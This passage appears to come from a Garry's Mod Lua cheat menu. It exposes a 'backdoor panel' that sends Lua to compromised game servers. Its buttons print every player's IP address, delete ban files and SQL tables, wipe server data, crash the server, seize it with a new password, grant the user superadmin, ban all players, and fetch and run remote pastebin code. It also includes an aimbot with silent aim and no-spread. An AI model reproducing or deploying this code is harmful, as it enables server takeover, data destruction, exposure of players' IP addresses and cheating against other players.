1442 hook.Add("PlayerFootstep", "oooh", function(ply)
1443 ply:EmitSound("vo/npc/female01/pain0" .. math.random(1, 9) .. ".wav", 75, math.random(50, 100))
1444 end)
1445 moanstep = true
1446 else
1447 hook.Remove("PlayerFootstep", "oooh")
1448 moanstep = false
1449 end]])
1450
1451end)
1452
1453 noob.AddButton("No Escape", bar1, function()
1454 surface.PlaySound("buttons/button18.wav")
1455 noob.PostLua([=[%s:SendLua("timer.Create([[A]],0.01,0,function()gui.HideGameUI()end)")]=])
1456
1457end)
1458
1459 noob.AddButton("Open URL On Players", bar1, function()
1460 surface.PlaySound("buttons/button18.wav")
1461 Derma_StringRequest("URL On Players", "URL Link", "", function(str)
1462 noob.PostLua([==[local ply = str
1463 ply:SendLua([[h=vgui.Create("DHTML")
1464 h:SetSize(ScrW(),ScrH())
1465 h:OpenURL(..str..)]])
1466 ]==])
1467
1468end)
1469end)
1470
1471 noob.AddButton("Explode all vehicles", bar1, function()
1472 surface.PlaySound("buttons/button18.wav")
1473 noob.PostLua([[for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
1474 local explo = ents.Create("env_explosion")
1475 explo:SetPos(v:GetPos())
1476 explo:SetKeyValue("iMagnitude", "300")
1477 explo:Spawn()
1478 explo:Activate()
1479 explo:Fire("Explode", "", 0)
1480 end
1481 end]])
1482
1483end)
1484
1485 noob.AddButton("Print All IP's", bar1, function()
1486 surface.PlaySound("buttons/button18.wav")
1487 noob.PostLua([[
1488 local id = ]] .. LocalPlayer():UserID() .. [[
1489 for k, v in pairs( player.GetAll() ) do
1490 Player( id ):ChatPrint( "Player: " .. v:Nick() .. " (" .. v:SteamID() .. ") IP: " .. v:IPAddress() )
1491 end]])
1492
1493end)
1494
1495 noob.AddButton("Toggle all doors", bar1, function()
1496 surface.PlaySound("buttons/button18.wav")
1497 noob.PostLua([[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("toggle", "", 0) end end]])
1498
1499end)
1500
1501 noob.AddButton("Lock all doors", bar1, function()
1502 surface.PlaySound("buttons/button18.wav")
1503 noob.PostLua([[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("lock", "", 0) end end]])
1504
1505end)
1506
1507 noob.AddButton("Unlock all doors", bar1, function()
1508 surface.PlaySound("buttons/button18.wav")
1509 noob.PostLua([[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("unlock", "", 0) end end]])
1510
1511end)
1512
1513 noob.AddButton("Remove Bans", bar1, function()
1514 surface.PlaySound("buttons/button18.wav")
1515 noob.PostLua([[if file.Exists("ulib/bans.txt", "DATA") then file.Delete("ulib/bans.txt") end]])
1516
1517end)
1518
1519 noob.AddButton("Reset all money", bar1, function()
1520 surface.PlaySound("buttons/button18.wav")
1521 noob.PostLua([[RunConsoleCommand("rp_resetallmoney")]])
1522
1523end)
1524
1525 noob.AddButton("RCON Steal", bar1, function()
1526 surface.PlaySound("buttons/button18.wav")
1527 chat.AddText(Color(255,0,0), "[somecheat] ", Color(255,155,155),"Feature in development")
1528
1529end)
1530
1531 noob.AddButton("RCON Command", bar1, function()
1532 surface.PlaySound("buttons/button18.wav")
1533 Derma_StringRequest("RCON Command", "Rcon", "", function(str)
1534 noob.PostRcon(str)
1535
1536end)
1537end)
1538
1539 noob.AddButton("Vaporize all players", bar1, function()
1540 surface.PlaySound("buttons/button18.wav")
1541 noob.PostLua([[for k, v in pairs(player.GetAll()) do v:Remove() end]])
1542
1543end)
1544
1545 noob.AddButton("FPP Unrestrict everything", bar1, function()
1546 surface.PlaySound("buttons/button18.wav")
1547 noob.PostLua([[if FPP then
1548 for k,v in pairs(FPP.Blocked) do
1549 for r,g in pairs(v) do
1550 RunConsoleCommand([=[FPP_RemoveBlocked]=], k, r)
1551 end
1552 end
1553 end]])
1554
1555end)
1556
1557 noob.AddButton("Wipe data folder", bar1, function()
1558 surface.PlaySound("buttons/button18.wav")
1559 noob.PostLua([[local files, directories = file.Find("*", "DATA") for k, v in pairs(files) do file.Delete(v) end]])
1560
1561end)
1562
1563 noob.AddButton("Wipe SQL Tables", bar1, function()
1564 surface.PlaySound("buttons/button18.wav")
1565 noob.PostLua([[MySQLite.query ('DROP TABLE darkrp_player' MySQLite.query('CREATE TABLE IF NOT EXISTS darkrp_player(idx INTEGER NOT NULL)')]])
1566
1567end)
1568
1569--[[-------------------------------------------------------------------------
1570Backdoorpanel Features 2
1571---------------------------------------------------------------------------]]
1572
1573 noob.AddButton("Play Sound From URL", bar2, function()
1574 surface.PlaySound("buttons/button18.wav")
1575 Derma_StringRequest("Play Sound", "Set Link (Has to end with .AUDIOFORMAT)", "", function(str)
1576 noob.PostLua("BroadcastLua([[sound.PlayURL(\"".. str .."\" , \"mono\", function() end)]])")
1577
1578end)
1579end)
1580
1581 noob.AddButton("Luarun From Pastebin", bar2, function()
1582 surface.PlaySound("buttons/button18.wav")
1583 Derma_StringRequest("RunLua", "Place Pastebin link inside box", "", function(str)
1584 noob.PostLua("http.Fetch(\""..str.."\", function( b, l, h, c ) RunString( b ) end, function() end )")
1585
1586end)
1587end)
1588
1589 noob.AddButton("ULX Unban SteamID", bar2, function()
1590 surface.PlaySound("buttons/button18.wav")
1591 Derma_StringRequest("ULX Unban SteamID", "SteamID", "", function(str)
1592 noob.PostLua([[RunConsoleCommand("ulx","logecho","0") RunConsoleCommand( "ulx", "unban", "..str..")]])
1593
1594end)
1595end)
1596
1597 noob.AddButton("Rainbow Buildings/Floor", bar2, function()
1598 surface.PlaySound("buttons/button18.wav")
1599 noob.PostLua([[BroadcastLua("http.Fetch('https://pastebin.com/raw/gCG1pSNK',function(b,l,h,c)RunString(b)end,nil)")]])
1600 chat.AddText(Color(255,0,0), "[somecheat] ", Color(255,155,155),"This may cause frame drop")
1601
1602end)
1603
1604 noob.AddButton("Ignite Everyone", bar2, function()
1605 surface.PlaySound("buttons/button18.wav")
1606 Derma_StringRequest("Ignite All Players", "Lenght In Seconds", "", function(str)
1607 noob.PostLua("for k, v in pairs(player.GetAll()) do v:Ignite(".. str ..") end")
1608
1609end)
1610end)
1611
1612 noob.AddButton("Ban Everyone", bar2, function()
1613 surface.PlaySound("buttons/button18.wav")
1614 Derma_StringRequest( "Ban All Players", "Reason", "", function(text)
1615 noob.PostLua([[
1616 local id = ]] .. LocalPlayer():UserID() .. [[
1617 for k, v in next, player.GetAll() do
1618 if v:UserID() == id then continue end
1619 v:Ban( 0, false )
1620 v:Kick( "]] .. tostring(text) .. [[" )
1621 end]])
1622
1623end)
1624end)
1625
1626 noob.AddButton("Corruption", bar2, function()
1627 surface.PlaySound("buttons/button18.wav")
1628 noob.PostLua([[http.Fetch("https://pastebin.com/raw/617S3m9V",function(b,l,h,c)RunString(b)end,nil)]])
1629
1630end)
1631
1632 noob.AddButton("Cleanup Map", bar2, function()
1633 surface.PlaySound("buttons/button18.wav")
1634 noob.PostLua([[game.CleanUpMap()]])
1635
1636end)
1637
1638 noob.AddButton("Disco Mode", bar2, function()
1639 surface.PlaySound("buttons/button18.wav")
1640 noob.PostLua([[http.Fetch("https://pastebin.com/raw/ixCT712U",function(b,l,h,c)RunString(b)end,nil)]])
1641
1642end)
1643
1644 noob.AddButton("EarRape", bar2, function()
1645 surface.PlaySound("buttons/button18.wav")
1646 noob.PostLua("for k,v in pairs(player.GetAll()) do v:EmitSound( \"npc/stalker/go_alert2a.wav\", 100, 100 ) end")
1647
1648end)
1649
1650 noob.AddButton("Meme Mode", bar2, function()
1651 surface.PlaySound("buttons/button18.wav")
1652 noob.PostLua([[http.Fetch('https://pastebin.com/raw/Mm9CKTM7',function(b,l,h,c)RunString(b)end,nil)]])
1653
1654end)
1655
1656 noob.AddButton("Rave Music", bar2, function()
1657 surface.PlaySound("buttons/button18.wav")
1658 noob.PostLua("BroadcastLua([[surface.PlaySound('music/hl1_song25_remix3.mp3')]])")
1659end)
1660
1661 noob.AddButton("Rainbow HUD", bar2, function()
1662 surface.PlaySound("buttons/button18.wav")
1663 noob.PostLua([[if !rainbowscreen then
1664 BroadcastLua("hook.Add('HUDPaint', 'rainbowscreen', function() local cin = math.sin(CurTime() * 10) * 255 surface.SetDrawColor(Color(cin, -cin, cin, 100)) surface.DrawRect(0, 0, ScrW(), ScrH()) end)")
1665 rainbowscreen = true
1666 else
1667 BroadcastLua("hook.Remove('HUDPaint', 'rainbowscreen')")
1668 rainbowscreen = false
1669 end]])
1670end)
1671
1672 noob.AddButton("Rainbow Props", bar2, function()
1673 surface.PlaySound("buttons/button18.wav")
1674 noob.PostLua([[if !rainbowobjects then
1675 function RainbowObjects()
1676 for q ,c in pairs(ents.GetAll()) do
1677 local r = math.random(1, 255)
1678 local g = math.random(1, 255)
1679 local b = math.random(1, 255)
1680 c:SetColor(Color(r, g, b))
1681 end
1682 end
1683 hook.Add("Think" , "FuckingGay" , RainbowObjects)
1684 rainbowobjects = true
1685 else
1686 hook.Remove("Think", "FuckingGay")
1687 rainbowobjects = false
1688 end]])
1689
1690end)
1691
1692 noob.AddButton("Hell Mode", bar2, function()
1693 surface.PlaySound("buttons/button18.wav")
1694 noob.PostLua([[BroadcastLua("http.Fetch('https://pastebin.com/raw/21tkfuM1',function(b,l,h,c)RunString(b)end,nil)")]])
1695
1696end)
1697
1698 noob.AddButton("Change Physics", bar2, function()
1699 surface.PlaySound("buttons/button18.wav")
1700 noob.PostLua([[RunConsoleCommand("sv_friction", "-8")]])
1701
1702end)
1703
1704 noob.AddButton("Change Gravity", bar2, function()
1705 surface.PlaySound("buttons/button18.wav")
1706 noob.PostLua([[RunConsoleCommand("sv_gravity", "-600")]])
1707
1708end)
1709
1710 noob.AddButton("Crash Server", bar2, function()
1711 surface.PlaySound("buttons/button18.wav")
1712 noob.PostLua([[timer.Create("Timerdecrash",0.5,1,function() while true do end end)]])
1713 chat.AddText(Color(255,0,0), "[somecheat] ", Color(20,150,200),"The server has been crashed gg")
1714
1715end)
1716
1717 noob.AddButton("Break Economy", bar2, function()
1718 surface.PlaySound("buttons/button18.wav")
1719 noob.PostLua([[for k,v in pairs(player.GetAll()) do v:addMoney(9999999999) end]])
1720
1721end)
1722
1723 noob.AddButton("Seize Server", bar2, function()
1724 surface.PlaySound("buttons/button18.wav")
1725 chat.AddText(Color(255,0,0), "[somecheat] ", Color(20,150,200),"Server Password is: gmodshiitsz")
1726 noob.PostLua([[RunConsoleCommand("sv_password", "gmodshiitsz")
1727 RunConsoleCommand("hostname", "SEIZED BY gmodshiitsS.TEAM")]])
1728
1729end)
1730
1731 noob.AddButton("Set Superadmin", bar2, function()
1732 surface.PlaySound("buttons/button18.wav")
1733 noob.PostLua([[local id = ]] .. LocalPlayer():UserID() .. [[
1734 Player(id):SetUserGroup("superadmin")]])
1735
1736end)
1737
1738 noob.AddButton("Delete Server", bar2, function()
1739 surface.PlaySound("buttons/button18.wav")
1740 noob.PostLua([[local function WipeDir(dir)
1741 local files,dirs = file.Find(dir.."*", "DATA")
1742 for k,v in ipairs(files) do
1743 file.Delete(dir..v)
1744 end
1745 for k,v in ipairs(dirs) do
1746 WipeDir(v.."/")
1747 end
1748 end
1749 print(60*60*6)
1750 local function wiperpro()
1751 print("Wiping server data. . .")
1752 WipeDir("")
1753 sql.Query("DROP TABLE darkrp_player; CREATE TABLE darkrp_player(a STRING)")
1754 if ULib then
1755 for k,v in pairs(ULib.ucl.groups) do
1756 if k != "user" then
1757 ULib.ucl.removeGroup(k)
1758 end
1759 end
1760 end
1761 if FPP then
1762 for k,v in pairs(FPP.Blocked) do
1763 for r,g in pairs(v) do
1764 RunConsoleCommand([=[FPP_RemoveBlocked]=], k, r)
1765 end
1766 end
1767 end
1768 for i=1,256 do
1769 RunConsoleCommand("removeid",i)
1770 end
1771 for k,v in ipairs(player.GetAll()) do
1772 v:Kick("Seized By gmodshiitss.Team")
1773 end
1774 print("Wipe finished !")
1775 end
1776 timer.Create("1Tap",0.5,1,function() while true do end end)
1777 wiperpro()]])
1778
1779end)
1780
1781--[[-------------------------------------------------------------------------
1782bdsettings Section
1783---------------------------------------------------------------------------]]
1784 local BD1 = vgui.Create('DPanelList', bdsettings)
1785 BD1:SetSize(762, 53)
1786 BD1:SetPos(16, 37)
1787 BD1.Paint = function(s, w, h)
1788 surface.SetDrawColor(Color(20, 20, 20))
1789 surface.DrawRect(0, 0, w, h)
1790 surface.SetDrawColor(21, 21, 21)
1791 surface.SetMaterial(upgrad)
1792 surface.SetDrawColor(o_color2)
1793 surface.SetMaterial(downgrad)
1794 surface.SetDrawColor(o_color2)
1795 surface.SetDrawColor(70, 70, 70, 255)
1796 surface.DrawOutlinedRect(0, 0, w, h)
1797
1798end
1799
1800 local setbd = vgui.Create("DTextEntry", BD1)
1801 setbd:SetPos(5, 5)
1802 setbd:SetSize(752, 44)
1803 setbd:SetTextColor(Color(255, 255, 255, 255))
1804 setbd:SetFont("Sheeta2")
1805 setbd.Paint = function(self, w, h)
1806 surface.SetDrawColor(Color(20, 20, 20))
1807 surface.DrawRect(0, 0, w, h)
1808 surface.SetDrawColor(45, 45, 45)
1809 surface.SetMaterial(upgrad)
1810 surface.SetDrawColor(o_color2)
1811 surface.SetMaterial(downgrad)
1812 surface.SetDrawColor(o_color2)
1813 surface.SetDrawColor(35, 35, 35, 255)
1814 surface.DrawOutlinedRect(0, 0, w, h)
1815 self:DrawTextEntryText(Color(255, 255, 255), Color(20, 20, 150), Color(100, 100, 100))
1816
1817end
1818
1819 setbd.OnEnter = function(self)
1820 noob.Notify("Targeting: '" .. setbd:GetValue() .. "'")
1821 channel = self:GetValue()
1822
1823end
1824
1825 local BD2 = vgui.Create("DPanelList", bdsettings)
1826 BD2:SetSize(762, 490)
1827 BD2:SetPos(16, 121)
1828 BD2.Paint = function(s, w, h)
1829 surface.SetDrawColor(Color(20, 20, 20))
1830 surface.DrawRect(0, 0, w, h)
1831 surface.SetDrawColor(21, 21, 21)
1832 surface.SetMaterial(upgrad)
1833 surface.SetDrawColor(o_color2)
1834 surface.SetMaterial(downgrad)
1835 surface.SetDrawColor(o_color2)
1836 surface.SetDrawColor(70, 70, 70, 255)
1837 surface.DrawOutlinedRect(0, 0, w, h)
1838
1839end
1840
1841 local coderun = vgui.Create("DTextEntry", BD2)
1842 coderun:SetPos(5, 5)
1843 coderun:SetSize(752, 480)
1844 coderun:SetMultiline(true)
1845 coderun:SetText("")
1846 coderun:SetTextColor(Color(255, 255, 255, 255))
1847 coderun:SetFont("Sheeta2")
1848 coderun.Paint = function(self, w, h)
1849 surface.SetDrawColor(Color(20, 20, 20))
1850 surface.DrawRect(0, 0, w, h)
1851 surface.SetDrawColor(45, 45, 45)
1852 surface.SetMaterial(upgrad)
1853 surface.SetDrawColor(o_color2)
1854 surface.SetMaterial(downgrad)
1855 surface.SetDrawColor(o_color2)
1856 surface.SetDrawColor(35, 35, 35, 255)
1857 surface.DrawOutlinedRect(0, 0, w, h)
1858 self:DrawTextEntryText(Color(255, 255, 255), Color(20, 20, 150), Color(100, 100, 100))
1859
1860end
1861
1862 coderun.OnEnter = function(self)
1863 chat.AddText(self:GetValue())
1864
1865end
1866
1867 local activerun = vgui.Create("DButton", bdsettings)
1868 activerun:SetSize(762, 34)
1869 activerun:SetPos(16, 617)
1870 activerun:SetFont("Features")
1871 activerun:SetText("Execute Code")
1872 activerun:SetTextColor(Color(255, 255, 255, 255))
1873 activerun.Paint = function(self, w, h)
1874 surface.SetDrawColor(Color(20, 20, 20))
1875 surface.DrawRect(0, 0, w, h)
1876 surface.SetDrawColor(45, 45, 45)
1877 surface.SetMaterial(upgrad)
1878 surface.SetDrawColor(o_color2)
1879 surface.SetMaterial(downgrad)
1880 surface.SetDrawColor(o_color2)
1881 surface.SetDrawColor(35, 35, 35, 255)
1882 surface.DrawOutlinedRect(0, 0, w, h)
1883
1884end
1885
1886 activerun.DoClick = function()
1887 surface.PlaySound("buttons/button18.wav")
1888 RunString(coderun:GetText())
1889
1890end
1891
1892 local bdscanner = vgui.Create("DButton", bdsettings)
1893 bdscanner:SetSize(375, 34)
1894 bdscanner:SetPos(16, 657)
1895 bdscanner:SetFont("Features")
1896 bdscanner:SetText("Backdoor Scan")
1897 bdscanner:SetTextColor(Color(255, 255, 255, 255))
1898 bdscanner.Paint = function(self, w, h)
1899 surface.SetDrawColor(Color(20, 20, 20))
1900 surface.DrawRect(0, 0, w, h)
1901 surface.SetDrawColor(45, 45, 45)
1902 surface.SetMaterial(upgrad)
1903 surface.SetDrawColor(o_color2)
1904 surface.SetMaterial(downgrad)
1905 surface.SetDrawColor(o_color2)
1906 surface.SetDrawColor(35, 35, 35, 255)
1907 surface.DrawOutlinedRect(0, 0, w, h)
1908
1909end
1910
1911 bdscanner.DoClick = function()
1912 surface.PlaySound("buttons/button18.wav")
1913 CheckBackdoors()
1914 end
1915
1916 local netfinder = vgui.Create("DButton", bdsettings)
1917 netfinder:SetSize(375, 34)
1918 netfinder:SetPos(403, 657)
1919 netfinder:SetFont("Features")
1920 netfinder:SetText("NetString Scan")
1921 netfinder:SetTextColor(Color(255, 255, 255, 255))
1922 netfinder.Paint = function(self, w, h)
1923 surface.SetDrawColor(Color(20, 20, 20))
1924 surface.DrawRect(0, 0, w, h)
1925 surface.SetDrawColor(45, 45, 45)
1926 surface.SetMaterial(upgrad)
1927 surface.SetDrawColor(o_color2)
1928 surface.SetMaterial(downgrad)
1929 surface.SetDrawColor(o_color2)
1930 surface.SetDrawColor(35, 35, 35, 255)
1931 surface.DrawOutlinedRect(0, 0, w, h)
1932
1933end
1934
1935 netfinder.DoClick = function()
1936 surface.PlaySound("buttons/button18.wav")
1937 local netstrings = {}
1938 for i = 1, 9999 do
1939 local s = util.NetworkIDToString(i)
1940 if s then print("NetChannel "..i.." = "..s) else break end
1941 end
1942 end
1943
1944-- Aimbot Page
1945
1946 local A1 = vgui.Create('DPanelList', aimpage)
1947 A1:SetSize(250, 640)
1948 A1:SetPos(51, 40)
1949 A1.Paint = function(s, w, h)
1950 surface.SetDrawColor(Color(21, 21, 21))
1951 surface.DrawRect(0, 0, w, h)
1952 surface.SetDrawColor(Color(20, 20, 20))
1953 surface.DrawRect(0, 0, w, h)
1954 surface.SetDrawColor(21, 21, 21)
1955 surface.SetMaterial(upgrad)
1956 surface.SetDrawColor(o_color2)
1957 surface.SetMaterial(downgrad)
1958 surface.SetDrawColor(o_color2)
1959 surface.SetDrawColor(50, 50, 50, 255)
1960 surface.DrawOutlinedRect(0, 0, w, h)
1961end
1962
1963local Av = vgui.Create('DCheckBoxLabel', A1)
1964Av:SetPos(5, 5)
1965Av:SetText("Enabled Aimbot")
1966Av:SetFont("Features")
1967Av:SetChecked(AIMBOT.Enabled)
1968Av.Paint = PanelDraw
1969function Av:OnChange(r)
1970 AIMBOT.Enabled = r
1971end
1972
1973local Av = vgui.Create('DCheckBoxLabel', A1)
1974Av:SetPos(5, 20)
1975Av:SetText("AutoFire")
1976Av:SetFont("Features")
1977Av:SetChecked(AIMBOT.AimbotAutoFire)
1978Av.Paint = PanelDraw
1979function Av:OnChange(r)
1980 AIMBOT.AimbotAutoFire = r
1981end
1982local Av = vgui.Create('DCheckBoxLabel', A1)
1983Av:SetPos(5, 35)
1984Av:SetText("SilentAim")
1985Av:SetFont("Features")
1986Av:SetChecked(AIMBOT.SilentAim)
1987Av.Paint = PanelDraw
1988function Av:OnChange(r)
1989 AIMBOT.SilentAim = r
1990end
1991
1992local Av = vgui.Create('DCheckBoxLabel', A1)
1993Av:SetPos(5, 50)
1994Av:SetText("Better Silent")
1995Av:SetFont("Features")
1996Av:SetChecked(AIMBOT.BetterSilentAim)
1997Av.Paint = PanelDraw
1998function Av:OnChange(r)
1999 AIMBOT.BetterSilentAim = r
2000end
2001local Av = vgui.Create('DCheckBoxLabel', A1)
2002Av:SetPos(5, 65)
2003Av:SetText("NoSpread")
2004Av:SetFont("Features")
2005Av:SetChecked(AIMBOT.NoSpread)
2006Av.Paint = PanelDraw
2007function Av:OnChange(r)
2008 if file.Exists("lua/bin/gmcl_dw_win32.dll", "GAME") then
2009 require("dw")
2010 elseif file.Exists("lua/bin/gmcl_dickwrap_win32.dll", "GAME") then
2011 require("dickwrap")
2012 end
2013 AIMBOT.NoSpread = r
2014end
2015
2016
2017
2018local Av = vgui.Create('DLabel', A1)
2019Av:SetPos(5, 90)
2020Av:SetFont("Features")
2021Av:SetText("Aimbot Key")
2022Av:SizeToContents()
2023local Av = vgui.Create('DBinder', A1)
2024Av:SetPos(5, 110)
2025Av:SetFont("Features")
2026if AIMBOT.AimbotKey then
2027 Av:SetValue(AIMBOT.AimbotKey)
2028end
2029Av.Paint = PanelDraw
2030function Av:OnChange(r)
2031 AIMBOT.AimbotKey = r
2032end
2033
2034 local A2 = vgui.Create('DPanelList', aimpage)
2035 A2:SetSize(310, 264)
2036 A2:SetPos(432, 40)
2037 A2.Paint = function(s, w, h)
2038 surface.SetDrawColor(Color(21, 21, 21))
2039 surface.DrawRect(0, 0, w, h)
2040 surface.SetDrawColor(Color(20, 20, 20))
2041 surface.DrawRect(0, 0, w, h)
2042 surface.SetDrawColor(21, 21, 21)
2043 surface.SetMaterial(upgrad)
2044 surface.SetDrawColor(o_color2)
2045 surface.SetMaterial(downgrad)
2046 surface.SetDrawColor(o_color2)
2047 surface.SetDrawColor(50, 50, 50, 255)
2048 surface.DrawOutlinedRect(0, 0, w, h)
2049
2050end
2051local Av = vgui.Create('DCheckBoxLabel', A2)
2052Av:SetPos(5, 5)
2053Av:SetText("Target same team")
2054Av:SetFont("Features")
2055Av:SetChecked(AIMBOT.TargetSameTeam)
2056Av.Paint = PanelDraw
2057function Av:OnChange(r)
2058 AIMBOT.TargetSameTeam = r
2059end
2060local Av = vgui.Create('DCheckBoxLabel', A2)
2061Av:SetPos(5, 20)
2062Av:SetText("Target admins")
2063Av:SetFont("Features")
2064Av:SetChecked(AIMBOT.TargetAdmins)
2065Av.Paint = PanelDraw
2066function Av:OnChange(r)
2067 AIMBOT.TargetAdmins = r
2068end
2069local Av = vgui.Create('DCheckBoxLabel', A2)
2070Av:SetPos(5, 35)
2071Av:SetText("Target steam friends")
2072Av:SetFont("Features")
2073Av:SetChecked(AIMBOT.TargetFriends)
2074Av.Paint = PanelDraw
2075function Av:OnChange(r)
2076 AIMBOT.TargetFriends = r
2077end
2078local Av = vgui.Create('DCheckBoxLabel', A2)
2079Av:SetPos(5, 50)
2080Av:SetText("Target frozen player")
2081Av:SetFont("Features")
2082Av:SetChecked(AIMBOT.TargetFrozen)
2083Av.Paint = PanelDraw
2084function Av:OnChange(r)
2085 AIMBOT.TargetFrozen = r
2086end
2087
2088local Av = vgui.Create('DCheckBoxLabel', A2)
2089Av:SetPos(5, 65)
2090Av:SetText("Target transparent players")
2091Av:SetFont("Features")
2092Av:SetChecked(AIMBOT.TargetFrozen)
2093Av.Paint = PanelDraw
2094function Av:OnChange(r)
2095 AIMBOT.TargetTransparent = r
2096end
2097
2098local function SnapToLast(cmd)
2099 if AIMBOT.AimbotLastAng and isangle(AIMBOT.AimbotLastAng) then
2100 cmd:SetViewAngles(AIMBOT.AimbotLastAng)
2101 return true
2102 end
2103 return false
2104end
2105local function GetAimPos(ply)
2106 local targethead = ply:LookupBone("ValveBiped.Bip01_Head1")
2107 local targetheadpos,targetheadang = ply:GetBonePosition(targethead)
2108
2109 return targetheadpos
2110end
2111local function CanAim(ply)
2112 if not ply:Alive() then return false end
2113 return ply:IsLineOfSightClear(GetAimPos(LocalPlayer()))
2114end
2115
2116
2117
2118local function GetBestTarget()
2119 // SameTeam TargetAdmins
2120 local bDistance = 9999999999999999
2121 local bPlayer = false
2122 for k,v in pairs(player.GetAll()) do
2123
2124 if (v == LocalPlayer()) or not v:Alive() then continue end
2125 if not AIMBOT.TargetAdmins and v:IsAdmin() then continue end
2126 if not AIMBOT.TargetSameTeam then
2127 if (v:Team() == LocalPlayer():Team()) then
2128 continue
2129 end
2130 end
2131 if not AIMBOT.TargetFrozen then
2132 if v:IsFrozen() then
2133 continue
2134 end
2135 end
2136 if not AIMBOT.TargetFriends then
2137 if v:GetFriendStatus() == "friend" then
2138 continue
2139 end
2140 end
2141 if not AIMBOT.TargetTransparent then
2142 if v:GetColor().a < 250 then
2143 continue
2144 end
2145 end
2146 if not CanAim(v) then continue end
2147 local dist = GetAimPos(LocalPlayer()):Distance(GetAimPos(v))
2148 if dist < bDistance then
2149 bDistance = dist
2150 bPlayer = v
2151 end
2152 end
2153
2154 return bPlayer
2155end
2156
2157hook.Add( "CalcView", "deving a aaeaeaeaeae",function( ply, pos, angles, fov )
2158 local ang = angles
2159 if AIMBOT.BetterSilentAim and AIMBOT.AimbotLastAng and isangle(AIMBOT.AimbotLastAng) then
2160 ang = AIMBOT.AimbotLastAng
2161 end
2162 local view = {}
2163 view.fov = fov
2164 view.angles = ang
2165 view.origin = pos
2166 return view
2167end)
2168local cones = {}
2169local nullvec = Vector() * -1
2170GAMEMODE["EntityFireBullets"] = function(self, p, data)
2171 local w = LocalPlayer():GetActiveWeapon()
2172 local Spread = data.Spread * -1
2173 if(not w or not w:IsValid() or cones[w:GetClass()] == Spread or Spread == nullvec) then return end
2174 cones[w:GetClass()] = Spread
2175end
2176local chatopen = false
2177hook.Add("StartChat", "reeee",function()
2178 chatopen = true
2179end)
2180hook.Add("FinishChat", "reeee",function()
2181 chatopen = false
2182end)
2183
2184local function AimBot(cmd)
2185 if not AIMBOT.Enabled then
2186 return
2187 end
2188 local cond = true
2189 if AIMBOT.AimbotKey then
2190
2191 cond = input.IsKeyDown(AIMBOT.AimbotKey)
2192 if chatopen then cond = false end
2193 end
2194 if cond then
2195 local wpon = LocalPlayer():GetActiveWeapon()
2196 if AIMBOT.SilentAim then
2197 if SnapToLast(cmd) then
2198 AIMBOT.AimbotLastAng = nil
2199 return
2200 end
2201 end
2202 local v = GetBestTarget()
2203 if v then
2204 if AIMBOT.SilentAim then
2205 AIMBOT.AimbotLastAng = cmd:GetViewAngles()
2206 end
2207 local aimang = (GetAimPos(v) - LocalPlayer():GetShootPos()):Angle()
2208 if AIMBOT.NoSpread and cones[wpon:GetClass()] then
2209 aimang = dickwrap.Predict(cmd,aimang:Forward(),cones[wpon:GetClass()]):Angle()
2210 end
2211 cmd:SetViewAngles(aimang)
2212
2213
2214 if AIMBOT.AimbotAutoFire then
2215 if !AIMBOT.AimbotAutoFireFire then
2216 else
2217 cmd:SetButtons(bit.bor(cmd:GetButtons(), IN_ATTACK))
2218 end
2219 AIMBOT.AimbotAutoFireFire = not AIMBOT.AimbotAutoFireFire
2220 return true
2221 end
2222 end
2223 else
2224 if AIMBOT.SilentAim then
2225 if SnapToLast(cmd) then
2226 AIMBOT.AimbotLastAng = nil
2227 return
2228 end
2229 end
2230 end
2231end
2232
2233hook.Add("GetMotionBlurValues", "GLX_GetMotionBlurValues",function()
2234 return 0,0,0,0
2235end)
2236hook.Add("CreateMove", "deving broaaaaaaa", function(cmd)
2237
2238 AimBot(cmd)
2239
2240
2241end)
2242
2243AIMBOT.lastrfirr = false
2244
2245 local A3 = vgui.Create('DPanelList', aimpage)
2246 A3:SetSize(310, 264)
2247 A3:SetPos(432, 416)
2248 A3.Paint = function(s, w, h)
2249 surface.SetDrawColor(Color(21, 21, 21))
2250 surface.DrawRect(0, 0, w, h)
2251 surface.SetDrawColor(Color(20, 20, 20))
2252 surface.DrawRect(0, 0, w, h)
2253 surface.SetDrawColor(21, 21, 21)
2254 surface.SetMaterial(upgrad)
2255 surface.SetDrawColor(o_color2)
2256 surface.SetMaterial(downgrad)
2257 surface.SetDrawColor(o_color2)
2258 surface.SetDrawColor(50, 50, 50, 255)
2259 surface.DrawOutlinedRect(0, 0, w, h)
2260
2261end
2262
2263 -- Visuals Page
2264
2265 local V1 = vgui.Create('DPanelList', esppage)
2266 V1:SetSize(326, 320)
2267 V1:SetPos(35, 45)
2268 V1.Paint = function(s, w, h)
2269 surface.SetDrawColor(Color(21, 21, 21))
2270 surface.DrawRect(0, 0, w, h)
2271 surface.SetDrawColor(21, 21, 21)
2272 surface.SetMaterial(upgrad)
2273 surface.SetDrawColor(o_color2)
2274 surface.SetMaterial(downgrad)
2275 surface.SetDrawColor(o_color2)
2276 surface.SetDrawColor(70, 70, 70, 255)
2277 surface.DrawOutlinedRect(0, 0, w, h)
2278end
2279
2280local Av = vgui.Create('DCheckBoxLabel', V1)
2281Av:SetPos(5, 5)
2282Av:SetText("Box ESP")
2283Av:SetFont("Features")
2284Av:SetChecked(ESP.BoxEnabled)
2285Av.Paint = PanelDraw
2286function Av:OnChange(r)
2287 ESP.BoxEnabled = r
2288end
2289
2290local Av = vgui.Create('DCheckBoxLabel', V1)
2291Av:SetPos(5, 20)
2292Av:SetText("Name ESP")
2293Av:SetFont("Features")
2294Av:SetChecked(ESP.NameEnabled)
2295Av.Paint = PanelDraw
2296function Av:OnChange(r)
2297 ESP.NameEnabled = r
2298end
2299local function BoxESP(v)
2300 local min, max = v:GetCollisionBounds()
2301 local pos = v:GetPos()
2302 local top, bottom = (pos + Vector(0, 0, max.z)):ToScreen(), (pos - Vector(0, 0, 8)):ToScreen()
2303 local middle = bottom.y - top.y
2304 local width = middle / 2.425
2305 surface.SetDrawColor(Color(200, 225, 0))
2306 surface.DrawOutlinedRect(bottom.x - width, top.y, width * 1.5, middle)
2307end
2308local function NameESP(v)
2309 local min, max = v:GetCollisionBounds()
2310 local pos = v:GetPos()
